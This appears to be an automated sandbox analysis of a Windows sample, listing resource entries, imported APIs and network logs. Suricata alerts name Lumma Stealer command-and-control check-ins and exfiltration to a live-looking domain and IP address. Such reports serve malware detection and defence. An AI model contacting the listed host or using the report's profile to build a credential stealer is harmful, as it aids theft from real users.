                                                                                                                                RT_STRING0xa720140x1d8dataEnglishUnited States0.6758474576271186
                                                                                                                                RT_STRING0xa721ec0x2fedataEnglishUnited States0.6292428198433421
                                                                                                                                RT_STRING0xa724ec0x376dataEnglishUnited States0.5079006772009029
                                                                                                                                RT_STRING0xa728640x328dataEnglishUnited States0.681930693069307
                                                                                                                                RT_STRING0xa72b8c0x34adataEnglishUnited States0.5653206650831354
                                                                                                                                RT_STRING0xa72ed80x31edataEnglishUnited States0.6290726817042607
                                                                                                                                RT_STRING0xa731f80x5e4dataEnglishUnited States0.5663129973474801
                                                                                                                                RT_STRING0xa737dc0x836dataEnglishUnited States0.42055185537583256
                                                                                                                                RT_STRING0xa740140x68edataEnglishUnited States0.6495828367103695
                                                                                                                                RT_STRING0xa746a40x7c2dataEnglishUnited States0.5171198388721048
                                                                                                                                RT_STRING0xa74e680x72cdataEnglishUnited States0.5620915032679739
                                                                                                                                RT_STRING0xa755940x4c8dataEnglishUnited States0.6111111111111112
                                                                                                                                RT_STRING0xa75a5c0x57adataEnglishUnited States0.43009985734664763
                                                                                                                                RT_STRING0xa75fd80x4d6dataEnglishUnited States0.6639741518578353
                                                                                                                                RT_STRING0xa764b00x55adataEnglishUnited States0.6197080291970803
                                                                                                                                RT_STRING0xa76a0c0x52cdataEnglishUnited States0.554380664652568
                                                                                                                                RT_STRING0xa76f380x5d8dataEnglishUnited States0.608957219251337
                                                                                                                                RT_STRING0xa775100x95adataEnglishUnited States0.38345864661654133
                                                                                                                                RT_STRING0xa77e6c0x876dataEnglishUnited States0.5198522622345337
                                                                                                                                RT_STRING0xa786e40x800dataEnglishUnited States0.5810546875
                                                                                                                                RT_STRING0xa78ee40x8badataEnglishUnited States0.486123545210385
                                                                                                                                RT_STRING0xa797a00x592dataEnglishUnited States0.6227208976157083
                                                                                                                                RT_STRING0xa79d340x494dataEnglishUnited States0.39505119453924914
                                                                                                                                RT_STRING0xa7a1c80x414dataEnglishUnited States0.4272030651340996
                                                                                                                                RT_STRING0xa7a5dc0x44edataEnglishUnited States0.5444646098003629
                                                                                                                                RT_STRING0xa7aa2c0x44adataEnglishUnited States0.43169398907103823
                                                                                                                                RT_STRING0xa7ae780x4c0dataEnglishUnited States0.537828947368421
                                                                                                                                RT_STRING0xa7b3380xa62dataEnglishUnited States0.41346877351392025
                                                                                                                                RT_STRING0xa7bd9c0xa88dataEnglishUnited States0.4328635014836795
                                                                                                                                RT_STRING0xa7c8240x946dataEnglishUnited States0.5686604886267902
                                                                                                                                RT_STRING0xa7d16c0xa5edataEnglishUnited States0.45139412207987945
                                                                                                                                RT_STRING0xa7dbcc0x70cdataEnglishUnited States0.5609756097560976
                                                                                                                                RT_STRING0xa7e2d80x14adataEnglishUnited States0.6606060606060606
                                                                                                                                RT_STRING0xa7e4240x136dataEnglishUnited States0.635483870967742
                                                                                                                                RT_STRING0xa7e55c0x112dataEnglishUnited States0.9051094890510949
                                                                                                                                RT_STRING0xa7e6700x17adataEnglishUnited States0.6084656084656085
                                                                                                                                RT_STRING0xa7e7ec0x104dataEnglishUnited States0.8961538461538462
                                                                                                                                RT_STRING0xa7e8f00xb3adataEnglishUnited States0.4826026443980515
                                                                                                                                RT_STRING0xa7f42c0xc7adataEnglishUnited States0.40388227927363807
                                                                                                                                RT_STRING0xa800a80xa4cdataEnglishUnited States0.571320182094082
                                                                                                                                RT_STRING0xa80af40xb48dataEnglishUnited States0.4878808864265928
                                                                                                                                RT_STRING0xa8163c0xa54dataEnglishUnited States0.5268532526475038
                                                                                                                                RT_STRING0xa820900xcf0dataEnglishUnited States0.5135869565217391
                                                                                                                                RT_STRING0xa82d800xe28dataEnglishUnited States0.38051876379690946
                                                                                                                                RT_STRING0xa83ba80xd0cdataEnglishUnited States0.5586826347305389
                                                                                                                                RT_STRING0xa848b40xedcdataEnglishUnited States0.47003154574132494
                                                                                                                                RT_STRING0xa857900xe64dataEnglishUnited States0.503257328990228
                                                                                                                                RT_STRING0xa865f40x452dataEnglishUnited States0.6301989150090416
                                                                                                                                RT_STRING0xa86a480x3f0dataEnglishUnited States0.4742063492063492
                                                                                                                                RT_STRING0xa86e380x32adataEnglishUnited States0.7358024691358025
                                                                                                                                RT_STRING0xa871640x34edataEnglishUnited States0.5921985815602837
                                                                                                                                RT_STRING0xa874b40x39edataEnglishUnited States0.6479481641468683
                                                                                                                                RT_STRING0xa878540x6cedataEnglishUnited States0.5597014925373134
                                                                                                                                RT_STRING0xa87f240xa78dataEnglishUnited States0.37089552238805973
                                                                                                                                RT_STRING0xa8899c0x932dataEnglishUnited States0.5739167374681393
                                                                                                                                RT_STRING0xa892d00x9a8dataEnglishUnited States0.5234627831715211
                                                                                                                                RT_STRING0xa89c780x9a4dataEnglishUnited States0.4813614262560778
                                                                                                                                RT_STRING0xa8a61c0x4bcdataEnglishUnited States0.6452145214521452
                                                                                                                                RT_STRING0xa8aad80x2aadataEnglishUnited States0.5381231671554252
                                                                                                                                RT_STRING0xa8ad840x27cdataEnglishUnited States0.6839622641509434
                                                                                                                                RT_STRING0xa8b0000x2a4dataEnglishUnited States0.7144970414201184
                                                                                                                                RT_STRING0xa8b2a40x2a0dataEnglishUnited States0.6502976190476191
                                                                                                                                RT_STRING0xa8b5440x246AmigaOS bitmap font "5\016*\016\025\0162\016#\016L\016\027\016 \0162\016"\016+\016%\0161\016\007\016\031", fc_YSize 26880, 8974 elements, 2nd "s", 3rd "e"EnglishUnited States0.738831615120275
                                                                                                                                RT_STRING0xa8b78c0x214dataEnglishUnited States0.5921052631578947
                                                                                                                                RT_STRING0xa8b9a00x23edataEnglishUnited States0.6515679442508711
                                                                                                                                RT_STRING0xa8bbe00x27edataEnglishUnited States0.7523510971786834
                                                                                                                                RT_STRING0xa8be600x21cdataEnglishUnited States0.6388888888888888
                                                                                                                                RT_STRING0xa8c07c0x386dataEnglishUnited States0.6862527716186253
                                                                                                                                RT_STRING0xa8c4040x8a0dataEnglishUnited States0.458786231884058
                                                                                                                                RT_STRING0xa8cca40x872dataEnglishUnited States0.49167437557816834
                                                                                                                                RT_STRING0xa8d5180x7a4dataEnglishUnited States0.6492842535787321
                                                                                                                                RT_STRING0xa8dcbc0x83cdataEnglishUnited States0.50853889943074
                                                                                                                                RT_STRING0xa8e4f80x644dataEnglishUnited States0.6315461346633416
                                                                                                                                RT_STRING0xa8eb3c0x2c2AmigaOS bitmap font "3\006*\006&\006F\006'\006A\006 ", fc_YSize 4294936073, 9990 elements, 2nd "\276\011\260\011 ", 3rd "r"EnglishUnited States0.5821529745042493
                                                                                                                                RT_STRING0xa8ee000x2f6dataEnglishUnited States0.5672823218997362
                                                                                                                                RT_STRING0xa8f0f80x27adataEnglishUnited States0.8028391167192429
                                                                                                                                RT_STRING0xa8f3740x2dedataEnglishUnited States0.6335149863760218
                                                                                                                                RT_STRING0xa8f6540x276dataEnglishUnited States0.7126984126984127
                                                                                                                                RT_STRING0xa8f8cc0x392dataEnglishUnited States0.5831509846827133
                                                                                                                                RT_STRING0xa8fc600x3a8dataEnglishUnited States0.5160256410256411
                                                                                                                                RT_STRING0xa900080x31cdataEnglishUnited States0.7273869346733668
                                                                                                                                RT_STRING0xa903240x386Targa image data - Color 1072 x 1093 x 32 +1083 +1075 "\257\0049\004;\0044\004;\0048\0049\0043\004 "EnglishUnited States0.5986696230598669
                                                                                                                                RT_STRING0xa906ac0x334dataEnglishUnited States0.6487804878048781
                                                                                                                                RT_STRING0xa909e00xa24dataEnglishUnited States0.5161787365177196
                                                                                                                                RT_STRING0xa914040xbd6dataEnglishUnited States0.4062706270627063
                                                                                                                                RT_STRING0xa91fdc0xaf6dataEnglishUnited States0.5823235923022095
                                                                                                                                RT_STRING0xa92ad40xc5adataEnglishUnited States0.48007590132827327
                                                                                                                                RT_STRING0xa937300xc86dataEnglishUnited States0.5028072364316906
                                                                                                                                RT_STRING0xa943b80x952dataEnglishUnited States0.5431684828164292
                                                                                                                                RT_STRING0xa94d0c0xabedataEnglishUnited States0.3916363636363636
                                                                                                                                RT_STRING0xa957cc0xa8adataEnglishUnited States0.5830244625648628
                                                                                                                                RT_STRING0xa962580xb78dataEnglishUnited States0.4887602179836512
                                                                                                                                RT_STRING0xa96dd00xb80dataEnglishUnited States0.5040760869565217
                                                                                                                                RT_STRING0xa979500x96adataEnglishUnited States0.5439834024896265
                                                                                                                                RT_STRING0xa982bc0xaa2dataEnglishUnited States0.39162380602498165
                                                                                                                                RT_STRING0xa98d600xa86dataEnglishUnited States0.5783221974758723
                                                                                                                                RT_STRING0xa997e80xb70dataEnglishUnited States0.5215163934426229
                                                                                                                                RT_STRING0xa9a3580xb38dataEnglishUnited States0.4794568245125348
                                                                                                                                RT_STRING0xa9ae900x9c2dataEnglishUnited States0.5612489991993594
                                                                                                                                RT_STRING0xa9b8540xc0edataEnglishUnited States0.41088788075178223
                                                                                                                                RT_STRING0xa9c4640xb3edataEnglishUnited States0.5111188325225852
                                                                                                                                RT_STRING0xa9cfa40xbacdataEnglishUnited States0.5471887550200804
                                                                                                                                RT_STRING0xa9db500xb70dataEnglishUnited States0.48189890710382516
                                                                                                                                RT_STRING0xa9e6c00x84edataEnglishUnited States0.5973659454374413
                                                                                                                                RT_STRING0xa9ef100x7c0dataEnglishUnited States0.4329637096774194
                                                                                                                                RT_STRING0xa9f6d00x7b4dataEnglishUnited States0.49898580121703856
                                                                                                                                RT_STRING0xa9fe840x70cdataEnglishUnited States0.5909090909090909
                                                                                                                                RT_STRING0xaa05900x7b0dataEnglishUnited States0.4949186991869919
                                                                                                                                RT_STRING0xaa0d400x606dataEnglishUnited States0.6465629053177692
                                                                                                                                RT_STRING0xaa13480x8a4dataEnglishUnited States0.4462025316455696
                                                                                                                                RT_STRING0xaa1bec0x8d8dataEnglishUnited States0.4620141342756184
                                                                                                                                RT_STRING0xaa24c40x786dataEnglishUnited States0.6246105919003115
                                                                                                                                RT_STRING0xaa2c4c0x872Targa image data - Color 2379 x 2337 x 32 +2344 +2354 "\027\0110\011?\011\017\011\025\011K\011 "EnglishUnited States0.48103607770582796
                                                                                                                                RT_STRING0xaa34c00x6f0dataEnglishUnited States0.5996621621621622
                                                                                                                                RT_STRING0xaa3bb00x896dataEnglishUnited States0.47952684258416745
                                                                                                                                RT_STRING0xaa44480x872dataEnglishUnited States0.4398704902867715
                                                                                                                                RT_STRING0xaa4cbc0x77adataEnglishUnited States0.6212121212121212
                                                                                                                                RT_STRING0xaa54380x824dataEnglishUnited States0.4923224568138196
                                                                                                                                RT_STRING0xaa5c5c0x6fcdataEnglishUnited States0.5956375838926175
                                                                                                                                RT_STRING0xaa63580xdcdataEnglishUnited States0.8772727272727273
                                                                                                                                RT_STRING0xaa64340xd8dataEnglishUnited States0.7407407407407407
                                                                                                                                RT_STRING0xaa650c0xccdataEnglishUnited States0.9215686274509803
                                                                                                                                RT_STRING0xaa65d80xf0dataEnglishUnited States0.7958333333333333
                                                                                                                                RT_STRING0xaa66c80xcadataEnglishUnited States0.8712871287128713
                                                                                                                                RT_STRING0xaa67940x7dadataEnglishUnited States0.5084577114427861
                                                                                                                                RT_STRING0xaa6f700x97edataEnglishUnited States0.4020576131687243
                                                                                                                                RT_STRING0xaa78f00x7ecdataEnglishUnited States0.5729783037475346
                                                                                                                                RT_STRING0xaa80dc0x8eedataEnglishUnited States0.47112860892388453
                                                                                                                                RT_STRING0xaa89cc0x8badataEnglishUnited States0.517905102954342
                                                                                                                                RT_STRING0xaa92880x1f20dataEnglishUnited States0.38679718875502006
                                                                                                                                RT_STRING0xaab1a80x2b14dataEnglishUnited States0.2920747188973522
                                                                                                                                RT_STRING0xaadcbc0x2756CLIPPER COFF executable (VAX #) not stripped - version 71EnglishUnited States0.40625620655412115
                                                                                                                                RT_STRING0xab04140x2aeedataEnglishUnited States0.34795268425841674
                                                                                                                                RT_STRING0xab2f040x27b2dataEnglishUnited States0.37699271796890377
                                                                                                                                RT_STRING0xab56b80xc1cdataEnglishUnited States0.4483870967741935
                                                                                                                                RT_STRING0xab62d40x364dataEnglishUnited States0.3467741935483871
                                                                                                                                RT_STRING0xab66380x32adataEnglishUnited States0.5530864197530864
                                                                                                                                RT_STRING0xab69640x33edataEnglishUnited States0.4867469879518072
                                                                                                                                RT_STRING0xab6ca40x330dataEnglishUnited States0.4215686274509804
                                                                                                                                RT_STRING0xab6fd40x340dataEnglishUnited States0.6153846153846154
                                                                                                                                RT_STRING0xab73140x3aedataEnglishUnited States0.4447983014861996
                                                                                                                                RT_STRING0xab76c40x366dataEnglishUnited States0.6091954022988506
                                                                                                                                RT_STRING0xab7a2c0x3b0dataEnglishUnited States0.6038135593220338
                                                                                                                                RT_STRING0xab7ddc0x390dataEnglishUnited States0.5537280701754386
                                                                                                                                RT_STRING0xab816c0x2f4dataEnglishUnited States0.6917989417989417
                                                                                                                                RT_STRING0xab84600x332Targa image data - RLE 1074 x 1072 x 32 +1072 +1082 "A\0045\004 "EnglishUnited States0.5158924205378973
                                                                                                                                RT_STRING0xab87940x36cdataEnglishUnited States0.5901826484018264
                                                                                                                                RT_STRING0xab8b000x376dataEnglishUnited States0.6557562076749436
                                                                                                                                RT_STRING0xab8e780x33edataEnglishUnited States0.5783132530120482
                                                                                                                                RT_STRING0xab91b80x4b4dataEnglishUnited States0.6395348837209303
                                                                                                                                RT_STRING0xab966c0xba2dataEnglishUnited States0.40597716588314303
                                                                                                                                RT_STRING0xaba2100xc80dataEnglishUnited States0.4353125
                                                                                                                                RT_STRING0xabae900xb54dataEnglishUnited States0.5582758620689655
                                                                                                                                RT_STRING0xabb9e40xb5cdataEnglishUnited States0.4470426409903714
                                                                                                                                RT_STRING0xabc5400x9b8dataEnglishUnited States0.5542604501607717
                                                                                                                                RT_STRING0xabcef80x86edataEnglishUnited States0.4712696941612604
                                                                                                                                RT_STRING0xabd7680x8ecdataEnglishUnited States0.44089316987740806
                                                                                                                                RT_STRING0xabe0540x7d2dataEnglishUnited States0.5934065934065934
                                                                                                                                RT_STRING0xabe8280x7d4dataEnglishUnited States0.49650698602794413
                                                                                                                                RT_STRING0xabeffc0x748dataEnglishUnited States0.5574034334763949
                                                                                                                                RT_GROUP_ICON0xabf7440x5adataEnglishUnited States0.7333333333333333
                                                                                                                                RT_VERSION0xabf7a00x488dataEnglishUnited States0.4387931034482759
                                                                                                                                RT_MANIFEST0xabfc280x3d2XML 1.0 document, ASCII text, with very long lines (864)EnglishUnited States0.5398773006134969

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllSetConsoleCursorPosition, SetConsoleTextAttribute, GetConsoleCursorInfo, SetConsoleMode, GetConsoleMode, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, ReadConsoleInputW, FillConsoleOutputCharacterW, OpenEventW, WaitForSingleObjectEx, WaitForMultipleObjectsEx, CreateFileW, GetFileSize, SystemTimeToFileTime, SetEndOfFile, SetFilePointer, FlushFileBuffers, CopyFileW, MoveFileExW, DeleteFileW, MoveFileW, ExpandEnvironmentStringsW, FindCloseChangeNotification, FindFirstChangeNotificationW, FindNextChangeNotification, GetExitCodeProcess, CreateDirectoryW, Sleep, MapViewOfFile, UnmapViewOfFile, TerminateProcess, OutputDebugStringW, WriteFile, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, RtlUnwind, InterlockedPushEntrySList, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ReadConsoleInputA, GetCommandLineA, GetNumberOfConsoleInputEvents, HeapAlloc, GetStringTypeW, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapSize, HeapReAlloc, SetConsoleCursorInfo, FindFirstFileExW, IsValidCodePage, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, SetFilePointerEx, LoadLibraryExW, FoldStringW, LocalSize, LocalAlloc, FindNextFileW, FindClose, GetEnvironmentVariableW, GetCurrentDirectoryW, GetWindowsDirectoryW, GetLongPathNameW, GetFullPathNameW, GetTempPathW, GetConsoleTitleW, GetModuleHandleA, LoadLibraryW, GetSystemDirectoryW, VerSetConditionMask, FreeLibrary, CompareStringW, GetProcAddress, GetModuleHandleW, WriteConsoleW, GetFileSizeEx, GetFileType, GetLocaleInfoW, GetOEMCP, GetACP, GetConsoleOutputCP, GetConsoleCP, GetStdHandle, SetLastError, InterlockedDecrement, InterlockedIncrement, InterlockedExchangeAdd, WaitForMultipleObjects, ReleaseMutex, InterlockedExchange, CreateThread, CreateMutexW, CreateEventW, GetFileAttributesW, GetModuleFileNameW, GetModuleHandleExW, SwitchToThread, InterlockedCompareExchange, SetEvent, CloseHandle, CreateProcessW, ResetEvent, WaitForSingleObject, ExitProcess, GetCurrentThreadId, GetModuleFileNameA, DebugBreak, FormatMessageW, lstrlenW, LocalFree, RtlCaptureStackBackTrace, CreateFileA, OutputDebugStringA, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetConsoleScreenBufferInfo, GetOverlappedResult, ConvertThreadToFiber, ConvertFiberToThread, CreateFiberEx, DeleteFiber, SwitchToFiber, GetCommandLineW, CancelIo, IsDebuggerPresent, SetConsoleTitleW, GetCurrentProcessId, DeleteCriticalSection, DecodePointer, RaiseException, GetLastError, ReadFile, ReadConsoleW, HeapFree, IsDBCSLeadByteEx, GetTimeZoneInformation, FreeLibraryAndExitThread, ExitThread, SetHandleInformation, WaitNamedPipeW, CreateFileMappingA, FindVolumeClose, FindNextVolumeW, GetVolumePathNamesForVolumeNameW, FindFirstVolumeW, QueryDosDeviceW, GetLogicalDriveStringsW, GetLocalTime, InitializeCriticalSectionAndSpinCount, GetCurrentProcess, UnhandledExceptionFilter, GetSystemDirectoryA, LoadLibraryA, MulDiv, GetTickCount, TryEnterCriticalSection, QueryPerformanceFrequency
                                                                                                                                USER32.dllGetProcessWindowStation, GetUserObjectInformationW, wsprintfW, GetKeyState, wsprintfA, ReleaseDC, MessageBoxA, CallWindowProcW, GetDC, RemovePropA, DestroyIcon, CharLowerW, MessageBoxW, FindWindowW, GetPropA, SendMessageW, CharLowerBuffW, GetSysColor
                                                                                                                                SHLWAPI.dllPathIsPrefixW
                                                                                                                                PSAPI.DLLGetModuleFileNameExW
                                                                                                                                WININET.dllInternetReadFile, InternetOpenW, InternetOpenUrlW, InternetCloseHandle, HttpQueryInfoW
                                                                                                                                WS2_32.dllgetservbyname, ntohs, getservbyport, gethostbyaddr, gethostbyname, inet_addr, WSAGetLastError, inet_ntoa, WSACleanup, WSAStartup, getpeername, WSASend, WSARecv, WSAGetOverlappedResult, WSAEnumNetworkEvents, htonl, WSAStringToAddressW, getsockname, WSASetLastError, htons, ntohl, shutdown, closesocket, WSAEnumProtocolsW, WSCGetProviderPath, WSASocketW, setsockopt, bind, WSAEventSelect, connect
                                                                                                                                ADVAPI32.dllCryptReleaseContext, CryptGenRandom, RegNotifyChangeKeyValue, RegEnumValueW, RegQueryInfoKeyW, RegDeleteValueW, RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExW, RegCloseKey, GetTokenInformation, SetSecurityDescriptorControl, SetSecurityDescriptorDacl, SetSecurityDescriptorOwner, InitializeSecurityDescriptor, GetAclInformation, AddAccessAllowedAceEx, SetEntriesInAclW, InitializeSid, GetSidLengthRequired, CopySid, GetLengthSid, EqualSid, OpenProcessToken, GetSidSubAuthority, IsValidSid, GetNamedSecurityInfoW, CryptAcquireContextA
                                                                                                                                SHELL32.dllShellExecuteExW, SHGetFolderPathW
                                                                                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree
                                                                                                                                USERENV.dllGetUserProfileDirectoryW
                                                                                                                                Secur32.dllFreeContextBuffer, EnumerateSecurityPackagesA, QuerySecurityPackageInfoA
                                                                                                                                CRYPT32.dllCryptProtectData, CryptUnprotectData
                                                                                                                                GDI32.dllGetDeviceCaps, DeleteDC
                                                                                                                                IPHLPAPI.DLLGetTcpTable

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-11-07T17:39:19.871748+01002057269ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (worddosofrm .shop)1192.168.2.4571081.1.1.153UDP
                                                                                                                                2024-11-07T17:39:20.512582+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449733104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:20.512582+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:21.047264+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:21.047264+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:22.136265+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449734104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:22.136265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:22.807473+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449734104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:22.807473+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:23.780419+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449736104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:23.780419+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:24.473718+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449735TCP
                                                                                                                                2024-11-07T17:39:25.179012+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449740104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:25.179012+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:26.832488+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449742104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:26.832488+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:28.750013+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449744104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:28.750013+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:30.232631+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449745104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:30.232631+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:30.721297+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449745104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:31.980700+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449746104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:31.980700+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:33.402164+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449747104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:33.402164+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:35.031255+01002057270ET MALWARE Observed Win32/Lumma Stealer Related Domain (worddosofrm .shop in TLS SNI)1192.168.2.449748104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:35.031255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:35.377073+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748104.21.16.142443TCP
                                                                                                                                2024-11-07T17:39:45.689040+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.456314TCP
                                                                                                                                2024-11-07T17:39:47.147971+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.456315TCP

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 7, 2024 17:39:19.889596939 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:19.889648914 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:19.889743090 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:19.893084049 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:19.893095970 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:20.512476921 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:20.512582064 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:20.517268896 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:20.517278910 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:20.517555952 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:20.563880920 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:20.574410915 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:20.574410915 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:20.574585915 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:21.047280073 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:21.047382116 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:21.047460079 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:21.053901911 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:21.053926945 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:21.053942919 CET49733443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:21.053949118 CET44349733104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:21.490422964 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:21.490469933 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:21.490550041 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:21.491182089 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:21.491194010 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.136188984 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.136265039 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.137830019 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.137840033 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.138098001 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.139548063 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.139638901 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.139647961 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807466984 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807514906 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807545900 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807584047 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.807600975 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807634115 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807671070 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807676077 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.807683945 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807712078 CET49734443192.168.2.4104.21.16.142
